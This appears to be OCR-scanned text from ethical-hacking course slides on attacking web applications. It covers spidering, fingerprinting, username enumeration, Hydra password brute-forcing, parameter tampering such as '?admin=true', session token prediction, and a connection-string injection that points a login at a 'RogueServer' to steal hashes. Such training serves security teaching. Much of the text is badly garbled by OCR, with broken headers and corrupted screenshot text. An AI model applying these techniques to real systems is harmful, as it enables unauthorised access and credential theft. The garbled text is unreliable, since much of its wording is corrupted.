h t t p : / / v ׳rf־r f.M n g .c o » / U » *y « s/i«a 1:ch? q-blk*i11 id« ־CCC7«70<SClCPJA9P:SA,SS9<J
A c c e pt-E nco ding : g z 1 p , d e lla te , 9dcH 5ir1C575D1:594*POPH-rcrRBA
Accvpt-Zncodisvg: cjzip , d * f lu te , aclch
| 0 matches A cce pt-lan gu a{re: en-US, en: g8 .0 ־
ic ce p c-cn a trse c: JSO -88S S-l,uc£-8;«r=0.7, '; q * 0 .3
W e b S p id e rin g U s in g B u r p S u ite
^ ^ S o u rc e : h t t p : / / w w w . p o r t s w i R g e r . n e t
W e b s p id e r e in g u sin g B u rp S u ite is d o n e in t h e f o l l o w i n g m a n n e r :
3. B r o w s e t h e t a r g e t a p p li c a t i o n w i t h J a v a S c r ip t e n a b le d a n d d is a b le d , a n d w i t h c o o k ie s
e n a b le d a n d d is a b le d
4. C he ck t h e s ite m a p g e n e r a t e d b y t h e B u rp p ro x y , a n d i d e n t i f y a n y h id d e n a p p li c a t i o n
c o n t e n t o r f u n c t io n s
W e b S p id e r in g U s in g M o z e n d a
W e b A g e n t B u ild e r
CEH
J M ozenda W eb A gent
B u ild e r c r a w ls t h r o u g h
a w e b s it e a n d h a rv e s ts
p a g e s o f in fo r m a tio n
W e b S p id e rin g U s in g M o z e n d a W e b A g e n t B u ild e r
S o u rc e : h t t p : / / w w w . m o z e n d a . c o m
W e b A p p H a c k in g M e th o d o lo g y
A tta c k W e b S e rv e rs
H a c k in g W e b s e rv e rs
—5. O n c e t h e a t t a c k e r id e n t if ie s t h e w e b s e rv e r e n v i r o n m e n t , a t ta c k e r s scan f o r k n o w n
v u ln e r a b i l it ie s by u sin g a w e b s e r v e r v u l n e r a b i l i t y s c a n n e r. V u l n e r a b i l i t y s c a n n in g h e lp s t h e
a t t a c k e r t o la u n c h t h e a t t a c k e a sily b y i d e n t i f y i n g t h e e x p l o i t a b l e v u ln e r a b i l it ie s p r e s e n t o n t h e
w e b s e rv e r. O n c e t h e a t t a c k e r g a th e r s all t h e p o t e n t i a l v u l n e r a b i l i t i e s , he o r sh e tr ie s t o e x p l o i t
t h e m w i t h t h e h e lp o f v a r io u s a t t a c k t e c h n i q u e s t o c o m p r o m i s e t h e w e b s e rv e r. In o r d e r t o s to p
t h e w e b s e rv e r f r o m s e rv in g l e g i t i m a t e users o r c lie n ts , t h e a t t a c k e r la u n c h e s a DoS a t ta c k
a g a in s t t h e w e b s e rv e r. You can la u n c h a tta c k s o n t h e v u ln e r a b l e w e b s e r v e r w i t h t h e h e lp o f
t o o l s such as U rIScan, N ik to , Nessus, A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r, W e b ln s p e c t , e tc.
W e b S e r v e r H a c k in g T o o l:
CEH
W e b ln s p e c t
J W e b ln s p e c t id e n tifie s s e c u r it y
v u l n e r a b il it ie s in t h e w e b
a p p lic a tio n s
J I t ru n s in t e r a c t iv e s c a n s u s in g
a s o p h is tic a te d u s e r in te r fa c e
W e b s e r v e r H a c k in g T o o l: W e b ln s p e c t
S o u rc e : h t t p s : / / d o w n l o a d . h p s m a r t u p d a t e . c o m
W e b l n s p e c t s o f t w a r e is w e b a p p li c a t i o n s e c u r it y a s s e s s m e n t s o f t w a r e d e s ig n e d t o t h o r o u g h l y
a n a ly z e t o d a y 's c o m p le x web a p p lic a tio n s . It d e liv e r s fa s t s c a n n in g c a p a b i l it ie s , b ro a d
a s s e s s m e n t c o v e r a g e , a n d a c c u r a te w e b a p p li c a t i o n s c a n n in g re s u lts . It id e n t if ie s s e c u r it y
v u ln e r a b i l it ie s th a t a re u n d e te c ta b le by tra d itio n a l scanners. A tta ck e rs can e x p lo it th e
i d e n t i f i e d v u l n e r a b i l it ie s f o r l a u n c h in g w e b s e rv ice s a tta c k s .
W e b A p p H a c k in g M e th o d o lo g y
A n a ly z e W e b A p p lic a tio n s
A n a ly z in g t h e w e b a p p li c a t i o n h e lp s y o u in i d e n t i f y i n g d i f f e r e n t v u ln e r a b l e p o i n t s t h a t can be
e x p l o i t a b l e b y t h e a t t a c k e r f o r c o m p r o m i s i n g t h e w e b a p p l i c a t i o n . D e t a ile d i n f o r m a t i o n a b o u t
a n a ly z in g a w e b a p p li c a t i o n a n d i d e n t i f y i n g t h e e n t r y p o i n t s t o b re a k i n t o t h e w e b a p p li c a t i o n
w i ll be d iscu sse d o n t h e f o l l o w i n g slides.
■ A n a ly z e t h e a c t i v e a p p l i c a t i o n ' s f u n c t i o n a l i t y a n d t e c h n o l o g i e s in o r d e r t o i d e n t i f y t h e a t t a c k
s u r fa c e s t h a t it e x p o s e s
™ j A n a ly z e W e b A p p lic a tio n s
I d e n t i f y E n t r y P o in ts f o r U s e r I n p u t
T h e e n t r y p o i n t o f an a p p li c a t i o n s e rve s as an e n t r y p o i n t f o r a tta c k s ; th e s e e n t r y p o in t s in c lu d e
t h e f r o n t - e n d w e b a p p li c a t i o n t h a t lis te n s f o r HTTP r e q u e s ts . R e v ie w t h e g e n e r a t e d HTTP
r e q u e s t t o i d e n t i f y t h e u s e r i n p u t e n t r y p o in ts .
I d e n t i f y S e r v e r - s id e F u n c t i o n a l i t y
S e r v e r -s id e f u n c t i o n a l i t y r e fe r s t o t h e a b i l it y o f a s e r v e r t h a t e x e c u t e s p r o g r a m s o n o u t p u t w e b
pages. T h o s e a re s c r ip ts t h a t re s id e a n d also a l l o w r u n n i n g i n t e r a c t i v e w e b p ages o r w e b s i t e s
o n p a r t i c u l a r w e b s e rve rs . O b s e r v e t h e a p p li c a t i o n s r e v e a le d t o t h e c l i e n t t o i d e n t i f y t h e s e rv e r-
side s t r u c t u r e a n d f u n c t i o n a l i t y .
I d e n t i f y S e r v e r - s id e T e c h n o l o g i e s
S e r v e r -s id e t e c h n o l o g i e s o r s e r v e r - s id e s c r ip tin g r e fe r s t o t h e d y n a m i c g e n e r a t io n o f w e b pages
t h a t a re s e rv e d by t h e w e b se rv e rs , as t h e y a re o p p o s e d t o s t a t i c w e b p a g e s t h a t a re in t h e
s to r a g e o f t h e s e r v e r a n d s e rv e d t o w e b b r o w s e r s . F i n g e r p r i n t t h e te c h n o l o g i e s a c tiv e o n t h e
s e r v e r u s in g v a r io u s f i n g e r p r i n t t e c h n i q u e s such as HTTP f i n g e r p r i n t i n g .
A n a ly z e W e b A p p lic a tio n s :
I d e n t if y E n tr y P o in ts fo r U & e r In p u t
U s e r In p u t
Q D u r in g t h e w e b a p p li c a t i o n a na lysis, a t ta c k e r s i d e n t i f y e n t r y p o i n t s f o r u se r i n p u t so t h a t
t h e y can u n d e r s t a n d t h e w a y t h e w e b a p p li c a t i o n a c c e p ts o r h a n d le s t h e u s e r i n p u t .
T h e n t h e a t t a c k e r tr ie s t o f i n d t h e v u ln e r a b i l it ie s p r e s e n t in i n p u t m e c h a n i s m a n d tr ie s
to e x p lo it th e m so t h a t a t t a c k e r can a s s o c ia te w ith o r g ain access t o th e web
a p p lic a t io n . E x a m in e URL, HTTP H e a d e r , q u e r y s t r i n g p a r a m e t e r s , POST d a t a , a nd
c o o k ie s t o d e t e r m i n e all u s e r i n p u t fie ld s .
0 I d e n t i f y HTTP h e a d e r p a r a m e t e r s t h a t can be p ro c e s s e d b y t h e a p p li c a t i o n as u se r
i n p u t s such as U s e r - A g e n t, R e fe r re r, A c c e p t, A c c e p t-L a n g u a g e , a n d H o s t h e a d e rs .
0 D e t e r m i n e URL e n c o d i n g t e c h n i q u e s a n d o t h e r e n c r y p t i o n m e a s u r e s i m p l e m e n t e d t o
s e c u r e t h e w e b t r a f f i c such as SSL.
T h e t o o l s u sed t o a n a ly z e w e b a p p li c a t i o n s t o i d e n t i f y e n t r y p o in t s f o r u s e r i n p u t i n c lu d e B u r p
S u ite , H t t P r i n t , W e b S c a r a b , O W A S P Zed A t t a c k P r o x y , e tc.
S e r v e r - S id e T e c h n o lo g ie s
» PHPSESSID - PHP
U iw http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0 Microxaft-IISJfl 0
O ops!
Apache;2 0.32 !Fedora)
Server Error in ,/ReportServer' Application.
Couldnotfindthepermissionsetnamed'ASP.Net'.
SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1
Description:Anunhandedexceptionoccurredduringthe
executionofthecurrentwebrequest. Pleasereviewthestack
\ 1 traceformoreinformationabouttheerrorandwhereit
Micro* oft-IIS'6.0.0 originatedinthecode.
VersionInformation: Microsoft .Net FrameworkVersion
4.0.30319;ASP.NetVersion4.0.30319.1
'> Server Side Technologies < •
T e c h n o lo g ie s
S o u rc e : h t t p : / / n e t - s q u a r e . c o m
A f t e r i d e n t i f y i n g t h e e n t r y p o i n t s t h r o u g h u s e r in p u t s , a t ta c k e r s t r y t o i d e n t i f y s e r v e r - s i d e
te c h n o lo g ie s .
T h e s e rv e r- s id e t e c h n o l o g i e s can be i d e n t i f i e d as f o l lo w s :
1. P e r f o r m a d e t a i le d s e r v e r f i n g e r p r i n t i n g , a n a ly z e HTTP h e a d e rs a nd H T M L s o u r c e c o d e
t o i d e n t i f y s e rv e r side te c h n o l o g i e s
E x a m in e URLs f o r file e x te n s io n s , d ir e c t o r i e s , a n d o t h e r i d e n t i f i c a t i o n i n f o r m a t i o n
E x a m in e t h e e r r o r p age m essa ge s
E x a m in e session t o k e n s :
e JSESSION ID - Java
© ASPSESSION I D - I I S s e r v e r
e A S P .N E T _ S e s s io n lD -A S P .N E T
e PHPSESS I D - P H P
A n a ly z e W e b A p p lic a tio n s : I d e n t if y s* c i ■
Examine pagesource and URLs and make an educated guess to determ ine the
internal structure and functionality of web applications
E x a m in e U R L
F u n c tio n a lity
O n c e t h e s e rv e r- s id e te c h n o l o g i e s a re d e t e r m i n e d , i d e n t i f y t h e s e r v e r - s id e f u n c t i o n a l i t y . This
h e lp s y o u t o f i n d t h e p o t e n t i a l v u l n e r a b i l it ie s in s e r v e r - s id e f u n c t io n a l it ie s . E x a m in e p age
source and URLs a n d make an e d u c a t e d guess t o d e te rm in e th e in te rn a l s tru c tu re a nd
f u n c t i o n a l i t y o f w e b a p p li c a t i o n s .
T o o ls U s e d :
0 % W g e t
—— Sour c e: h t t p : / / w w w . g n u . o r g
T e le p o rt P ro
S o u rc e : h t t p : / / w w w . t e n m a x . c o m
T e l e p o r t Pro is an a ll - p u r p o s e h ig h - s p e e d t o o l f o r g e t t i n g d a ta f r o m t h e I n t e r n e t . L au nch u p t o
t e n s i m u l t a n e o u s r e t r ie v a l th r e a d s , access p a s s w o r d - p r o t e c t e d sites, f i l t e r file s b y size a nd
A n a ly z e W e b A p p l i c a t i o n s : M a p
CEH
t h e A t t a c k S u r f a c e Urt1fw4 ilh iu l lUtbM
File U p lo a d a n d
D ire c to ry T ra v e rs a l E rro r M es s a g e I n fo r m a tio n L e a kage
D o w n lo a d
D is p la y o f
C ro s s -S ite S c rip tin g E m a il In te r a c tio n E m a il In je c tio n
U s e r-S u p p lie d D a ta
R e d ire c tio n , H e a d e r
D y n a m ic R e d ire c ts A p p lic a tio n C o des B u ffe r O v e rflo w s
In je c tio n
T h e r e a re v a r io u s e n t r y p o i n t s f o r a tt a c k e r s t o c o m p r o m i s e t h e n e t w o r k , so p r o p e r
a na lys is o f t h e a t t a c k s u rfa c e m u s t be d o n e . T h e m a p p i n g o f t h e a t t a c k s u rfa c e in c lu d e s
t h o r o u g h c h e c k in g o f p o s s ib le v u l n e r a b i l i t i e s t o la u n c h t h e a tta c k . T h e f o l l o w i n g a re t h e
v a r io u s f a c t o r s t h r o u g h w h i c h an a t t a c k e r c o lle c ts t h e i n f o r m a t i o n a n d p la n s t h e k in d o f a t ta c k
t o b e la u n c h e d .
W e b A p p H a c k in g M e th o d o lo g y
__
A t t a c k A u t h e n t i c a t io n
CEH
M e c h a n i s m
U s e r N a m e E n u m e ra tio n
U ser n a m e s can be e n u m e r a t e d in t w o w a y s ; o n e is v e r b o s e f a i l u r e m e s s a g e s a n d t h e
o t h e r is p r e d i c t a b l e u s e r n a m e s .
V e rb o s e F a ilu re M e s s a g e
— ' In a t y p ic a l lo g in s y s te m , t h e u s e r is r e q u i r e d t o e n t e r t w o p ie ces o f i n f o r m a t i o n , t h a t
is, u s e r n a m e a n d p a s s w o r d . In s o m e cases, an a p p li c a t i o n w ill ask f o r s o m e m o r e
i n f o r m a t i o n . If t h e u s e r is t r y i n g t o log in a n d fa ils, t h e n it can be in f e r r e d t h a t a t le a s t o n e o f
t h e p ie ce s o f t h e i n f o r m a t i o n t h a t is p r o v id e d by t h e u s e r is i n c o r r e c t o r i n c o n s i s t e n t w i t h th e
o t h e r i n f o r m a t i o n p r o v id e d by t h e user. T h e a p p li c a t i o n d is clo ses t h a t p a r t i c u l a r i n f o r m a t i o n
t h a t is p r o v id e d by t h e u s e r w a s i n c o r r e c t o r in c o n s is t e n t ; it w ill be p r o v id i n g g r o u n d f o r an
a t t a c k e r t o e x p l o i t t h e a p p li c a t i o n .
I f lo g in e rro r s ta te s w h ic h p a rt o f th e u s e r n a m e a n d p a s s w o rd is n o t c o rre c t, g u e s s
th e u s e rs o f th e a p p lic a tio n u s in g t h e tr ia l- a n d - e r r o r m e th o d
U s e r N a m e E n u m e r a tio n
S o u rc e : h ttp s ://w o r d p r e s s .c o m
A tta c k e rs c a n use an e n u m e ra te d u s e r n a m e o r p re d ic t th e
session id e n tifie r t o b y p a s s a u th e n tic a tio n m e c h a n is m s
P a s s w o r d C h a n g in g
P a s s w o rd R e c o v e ry
R e m e m b e r M e E x p lo it
R e m e m b e r M e fu n c tio n s a re im p le m e n te d u s in g a s im p le p e r s is te n t c o o k ie , su ch as
R e m e m b e rU s e r= ja s o n o r a p e r s is te n t se ssio n id e n t if ie r such as R e m e m b e rU s e r= A B Y 1 1 2 0 1 0 .
% !0 u it *lout
T arget Pa3swcrdc | T uning | Cpeciffc | Gtart j T a 1g«l P a ssw crts |T un.ng |0 p e c ific Gtart |
Usernam e O u to jt
H ydra v4 * (c) 5 0 0 4 by v a n M a u s e r /T H C • u s e allo׳A/Pd only for legal p u r p o s e s
( • Usernam e test!
H y d ׳a (tv to . •vw.ua Ihc erg) sta rlin g at 2 004-05-17 5 1 :58:52
C Usom am o Lict [D A ' AJ 3 2 ta s k s . 1 se rv e rs , 4 5 3 8 0 login trie s (l:1/p:45380). ~ 1418 trie s p e r ta s k
[ d a t a ] a r a c k n g s e rv ic e ftp on port 21
(STATUS] 14055.00Ules/min. 14050IrlesIn00:01h. 31324lexfoIn00:031)
C Password [STATUS] 14513.00ifles/min. 29020triesIn00:0211. 15354tcxioIn00.0211
[2 [] וTip] h o s t: 127.0.0.1 lo g in : m a rc p a s s w o r d : s u c c e s s
<* Passv/ora List Hyda(Mp.//*#swlhcerg)finisheda! 2004-05-1722:01:38
< r1 n lsh e d >
C olo r separated rile
- ■ P a s s w o rd A tta c k s : P a s s w o rd G u e s s in g
J1=S
- P a ssw o rd g u e s s in g is a m e th o d w h e re an a tta c k e r g u e sses v a rio u s p a s s w o rd s u n til he
o r she g e ts th e c o rr e c t p a s s w o rd s b y u s in g th e fo llo w in g m e th o d s : p a s s w o rd lis t, p a s s w o rd
d ic tio n a r y , a n d v a rio u s to o ls .
P a s s w o rd D ic tio n a r y
T o o ls U s e d f o r P a s s w o r d G u e s s in g
T H C -H y d ra
S o u rc e : h t t p : / / w w w . t h c . o r g
C o p y r ig h t © by E&Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
P a s s w o rd A tta c k s : B ru te F o r c in g
wcav 1 1 B r u t e f o r c e is o n e o f t h e m e t h o d s u s e d f o r c r a c k i n g p a s s w o r d s . In a b r u t e f o r c i n g
a t t a c k , a t t a c k e r s c r a c k t h e l o g in p a s s w o r d s b y t r y i n g all p o s s i b l e v a l u e s f r o m a s e t o f a l p h a b e t ,
n u m e ric , and s p e cia l c h a ra cte rs. T he m a in lim ita tio n o f th e b ru te fo rc e a tta c k is t h i s is
b e n e f i c i a l in i d e n t i f y i n g s m a l l p a s s w o r d s o f t w o c h a r a c t e r s . G u e s s i n g b e c o m e s m o r e c r u c i a l
w h e n t h e p a s s w o r d l e n g t h is l o n g e r a n d a ls o i f i t c o n t a i n s l e t t e r s w i t h b o t h u p p e r a n d l o w e r
c a s e . If n u m b e r s a n d s y m b o l s a r e u s e d , t h e n i t m i g h t e v e n t a k e m o r e t h a n a f e w y e a r s t o g u e s s
t h e p a s s w o r d , w h i c h is a l m o s t p r a c t i c a l l y i m p o s s i b l e . C o m m o n l y u s e d p a s s w o r d c r a c k i n g t o o l s
b y a t t a c k e r s i n c l u d e B u r p S u it e 's I n t r u d e r , B r u t u s , S e n s e p o s t ' s C r o w b a r , e tc .
B u rp S u it e 's I n t r u d e r
• > S ource: h t t p : / / p o r t s w ig g e r . n e t
B u r p I n t r u d e r is a m o d u l e o f B u r p S u i t e . It e n a b l e s t h e u s e r t o a u t o m a t i z e p e n t e s t i n g o n w e b
a p p lic a tio n s .
C o p y r ig h t © b y EC-Couactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
S e s s io n A tta c k s : S e s s io n ID P r e d ic tio n /B r u te F o r c in g
A tta c k e rs c a n t r a p c o o k ie s u s in g to o ls s u c h as O W A S P Z e d A t t a c k P ro x y , B u rp S u ite , e tc .
— '■J M J U j U B i
itt_____ *
H i - * " 1*1 C
.: _ ו וM c x ilW S .C IS ia dc י.* t t € .2 ; EHK«4t A ppl«V eb K it/537.4 (KETKL it—19: 1
_
I l k • Scckol Cfcr0K */2 2 . 0 . 12 2 » .9 4 S«C«X1 /5 3 7 .4
C ach e-C onti0 1 : oax-aoe=0
A ccep t! • / •
Rererer: ntcr://in.yonoc.oca»/?p^;3
A ee ep t-E n c cd in g : a deft
A c c ep t-L a n ^ u iq v : c n -U S ,« n ;q ^ > .9
A c c v p t-C h a sa v t: X SO -S559-1.at£-S ;<f-C . 7 , • j q - 0 .3
C oo k l•: a<Uld015S24S9e12Sar4e: « < u r-:3 S 4 « U ~ C m 3 :
Hoats ti.a d ls ie z a x .c o a
Current Scans 0
URI found during aa*M
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n Is S t r i c t l y P r o h ib it e d
C o o k ie E x p lo ita tio n : C o o k ie P o is o n in g
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
AuthorizationAttack CEH
C«rt1fW4 itfciul Nm Im
Q u e ry S t r in g H id d e n Tags
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A u th o r iz a tio n A tta c k
P a r a m e te r T a m p e r in g
lE P P o s tD a ta
P ost d a ta o fte n is c o m p ris e d o f a u th o r iz a tio n a n d se ssio n in fo r m a tio n , sin c e in m o s t
o f th e a p p lic a tio n s , th e in fo r m a tio n t h a t is p ro v id e d b y th e c lie n t m u s t be a s s o c ia te d
H T T P R e q u e s t T a m p e r in g CEH
Q u e ry S trin g T a m p e rin g
J I f t h e q u e r y s tr in g is v is ib le in t h e a d d re s s b a r o n t h e b r o w s e r, t h e a tta c k e r c a n e a s ily c h a n g e t h e
s tr in g p a r a m e te r t o b y p a s s a u t h o r iz a t io n m e c h a n is m s
h t t p s : / / ju g g y s h o p . c o m /b o o k s /d o w n lo a d /8 5 2 7 4 1 3 6 9 . p d f
h t t p s : / / ju g g y b a n k . c o m /lo g in / h o m e . js p ? a d m in = t r u e
J A tta c k e rs c a n u s e w e b s p id e r in g to o ls s u c h as B u r p S u ite t o s c a n t h e w e b a p p f o r PO ST p a r a m e te rs
H TTP H e a d e rs
J I f t h e a p p lic a tio n u se s t h e R e fe r e r h e a d e r f o r m a k in g acc e s s c o n t r o l d e c is io n s , a tta c k e rs c a n m o d if y it
t o acc e s s p r o t e c t e d a p p lic a t io n f u n c t i o n a l it ie s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
H T T P R e q u e s t T a m p e r in g
Q u e r y S tr in g T a m p e r in g
F IG U R E 1 3 .4 6 : Q u e ry S t r in g T a m p e r in g
H T T P H e a d e rs
h ttp s ://w w w .o w a s p .o rg
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
S o u rc e : h ttp s ://w w w .o w a s p .o r g
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e th o d o lo g y
A tta c k S e s s io n M a n a g e m e n t M e c h a n is m
S e s s io n M a n a g e m e n t A t t a c k
S e s s io n M a n a g e m e n t A tta c k
0 S ession T o k e n s P re d ic tio n
© S ession T o k e n s T a m p e rin g
0 S ession H ija c k in g
© S ession R e p la y
Q M a n -ln -T h e - M id d le A tta c k
W e a k E n c o d in g E x a m p le
h t t p s : //w w w . ju g g y b o y . c o m /c h e c k o u t?
S e s s io n T o k e n = % 7 5 % 7 3 % 6 5 % 7 2 % 3 D % 6 A % 6 1 % 7 3 % 6 F % 6 E % 3 B % 6 1 % 7 0 % 7 0 % 3 D % 6 1 % 6 4 % 6 D % 6 9 % 6 E % 3 B % 6
4 % 6 1 % 7 4 % 6 5 % 3 D % 3 2 % 3 3 % 2 F % 3 1 % 3 1 % 2 F % 3 2 % 3 0 % 3 1 % 3 0
W h e n h e x - e n c o d in g o f an AS C II s tr in g user=jason;app=admin;date=23/ll/201
s e s s io n to k e n b y ju s t c h a n g in g d a te a n d u s e it f o r a n o th e r tr a n s a c tio n w it h s e r v e r
S e s s io n T o k e n P r e d ic t io n
a n a ly z in g it f o r e n c o d in g ( h e x - e n c o d in g , B a s e 6 4 ) o r a n y p a tte rn
A tta c k e rs th e n m a k e a la r g e n u m b e r o f re q u e s ts w ith th e p r e d ic te d to k e n s to a s e s s io n - d e p e n d e n t
p a g e to d e te r m in e a v a lid s e s s io n to k e n
C o p y r ig h t © b y E&CsiMCtl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A tta c k in g S e s s io n T o k e n G e n e r a tio n M e c h a n is m
W e a k E n c o d in g E x a m p le
G
h t t p s : / / w w w . ju g g y b o y . c o m / c h e c k o u t ?
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%
64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
W h e n h e x -e n c o d in g o f an ASCII s tr in g u s e r = j a s o n ; a p p = a d m i n ; d a t e = 2 3 / l l / 2 0 l 0 , th e a tta c k e r
can p re d ic t a n o th e r se ssio n to k e n b y ju s t c h a n g in g th e d a te a n d u s in g it f o r a n o th e r tr a n s a c tio n
w ith th e s e rv e r.
S e s s io n T o k e n P r e d ic t io n
A tta c k in g S e s s io n T o k e n s
M e c h a n is m : S e s s io n T o k e n
H a n d lin g
S n iffin g
r
JL
c
^ !7
u
■ A tta c k e rs s n iff th e a p p lic a tio n t r a f fic using a s n iffin g t o o l such as W ire s h a rk o r a n in te rc e p tin g p ro x y such as B u rp . If
HTTP c o o k ie s a re bein g used as th e tra n s m is s io n m e c h a n is m f o r session to k e n s a n d th e s e cure fla g is n o t se t, a tta c k e rs
c a n re p la y t h e c o o k ie t o ga in u n a u th o riz e d access t o a p p lic a tio n
A tta c k in g S e s s io n T o k e n s H a n d lin g M e c h a n is m :
S e s s io n T o k e n S n iffin g
W ir e s h a r k
S o u rc e : h tt p : / / w w w . w ir e s h a r k . o r g
W ir e s h a r k is a n e tw o r k p ro to c o l a n a ly z e r. It le ts y o u c a p tu re a n d in te r a c tiv e ly b ro w s e th e tr a f fic
r u n n in g o n a c o m p u te r n e tw o r k . It c a p tu re s liv e n e tw o r k t r a f f ic fr o m E th e rn e t, IEEE 8 0 2 .1 1 ,
P P P /H D LC , A T M , B lu e to o th , USB, T o k e n R in g , F ra m e R e la y , a n d FDDI n e tw o r k s . C a p tu re d file s
can be p ro g r a m m a tic a lly e d ite d via th e c o m m a n d lin e .
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
נ
InjectionAttacks CEH
Urt1fw4 ilhiul lUthM
th e in te r p r e te d la n g u a g e b e in g u se d in o rd e r to b re a k a p p lic a t io n 's n o rm a l in te n d e d
W e b S c r ip ts I n je c t io n S Q L I n je c t io n
If user in p u t is used in to code th a t is d yn a m ica lly
E n te r a s e r ie s o f m a lic io u s S Q L q u e r ie s
th e d a ta b a s e
th e server
B ם
O S C o m m a n d s I n je c t io n LD A P I n je c t io n
E x p lo it o p e r a tin g s y s te m s b y e n te r in g T a k e a d v a n ta g e o f n o n - v a lid a te d w eb
u t iliz e u s e r in p u t in a s y s t e m - le v e l c o m m a n d filte r s to o b t a in d ir e c t a c c e s s t o d a ta b a s e s
B a
S M T P I n je c t io n X P a th I n je c t io n
In je c t a r b it r a r y S T M P c o m m a n d s in t o E n te r m a lic io u s s tr in g s in in p u t fie ld s in
g e n e r a t e la r g e v o lu m e s o f s p a m e m a il t h a t it in te r fe r e s w ith th e a p p l i c a t i o n 's lo g ic
N o t e : F o r c o m p le t e c o v e r a g e o f S Q L In je c t io n c o n c e p ts an d te c h n iq u e s re fe r to M o d u le 1 4 : S Q L I n je c t io n
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
I
In je c tio n A tta c k s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
A t t a c k D a t a C o n n e c t iv it y CEH
ץ ־ r~
D a ta b a s e c o n n e c tio n s tr in g s a re u s e d D a ta b a s e c o n n e c tiv ity a tta c k s e x p lo it
e n g in e s d a ta b a s e in s te a d o f a b u s in g
d a ta b a s e q u e r ie s
"D a ta S o u rc e = S e rv e r,P o rt;
0 r r
N etw o rk Library=DBMSSOCN; D a ta C o n n e c tiv ity A tta c k s
I n i t i a l C a ta lo g = D a ta B a se ; 0r r S C o n n e c tio n S t r in g I n je c t io n
U ser ID=Username;
Password=pwd;" 0r r S C o n n e c tio n S t r in g P a ra m e te r
0r r
P o llu t io n (C S P P ) A tta c k s
E x a m p le o f a c o m m o n c o n n e c tio n S C o n n e c tio n P o o l D oS
<s=©
s tr in g u s e d to c o n n e c t to a M ic r o s o f t
S Q L S e rv e r d a ta b a s e
0 T r
o
J ־L
_ y v_
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
" D a ta S o u r c e = S e r v e r , P o r t ; N e tw o r k L ib ra ry = D B M S S O C N ; In itia l C a t a lo g = D a ta B a s e ;
U ser ID = U s e rn a m e ; P a s s w o r d = p w d ;"
C o n n e c tio n S tr in g In j e c t i o n CEH
In a d e le g a te d a u th e n tic a tio n e n v ir o n m e n t, th e a t ta c k e r in je c ts p a ra m e te rs in a
c o n n e c tio n s tr in g b y a p p e n d in g th e m w ith th e s e m ic o lo n ( ;) c h a r a c t e r
is u s e d to b u ild c o n n e c tio n s tr in g s b a s e d o n u s e r in p u t
B e fo re I n je c t io n
A f t e r I n je c t io n
W h e n t h e c o n n e c tio n s tr in g is p o p u la te d , t h e Encryption v a lu e w i ll b e a d d e d t o t h e p r e v io u s ly c o n f ig u r e d s e t
o f p a ra m e te rs
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
C o n n e c tio n S tr in g In je c tio n
■
^ A c o n n e c tio n s trin g in je c tio n a tta c k can o c c u r w h e n d y n a m ic s trin g c o n c a te n a tio n is
u sed to b u ild c o n n e c tio n s trin g s t h a t a re b ase d o n u s e r in p u t. If th e s trin g is n o t v a lid a te d a nd
m a lic io u s t e x t o r c h a ra c te rs n o t e s c a p e d , an a tta c k e r can p o t e n t ia lly access s e n s itiv e d a ta o r
o th e r re s o u rc e s o n th e s e rv e r. F or e x a m p le , an a tta c k e r c o u ld m o u n t an a tta c k b y s u p p ly in g a
s e m ic o lo n a n d a p p e n d in g an a d d itio n a l v a lu e . T h e c o n n e c tio n s trin g is p a rs e d b y u s in g a "la s t
o n e w in s " a lg o r ith m , a nd th e h o s tile in p u t is s u b s titu te d f o r a le g itim a te v a lu e .
B e fo re in je c tio n
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A tta c k s
H a s h S t e a lin g
D a ta s o u r c e = S Q L 2 0 0 5 ; i n i t i a l c a t a l o g d b l; in t e g r a t e d s e c u r it y = n o ; user
I D = ; D a t a S o u rc e = R o g u e S e r v e r ; P a ssw ord= In te g r a te d S e c u r ity = tr u e ;
P o r t S c a n n in g
ב A tta c k e r tr ie s to c o n n e c t t o d if fe r e n t p o r ts b y c h a n g in g th e v a lu e a n d s e e in g th e e r r o r
m e ssa ge s o b ta in e d .
s im u lta n e o u s ly t o c o n s u m e a ll c o n n e c t io n s in th e c o n n e c tio n p o o l, c a u s in g
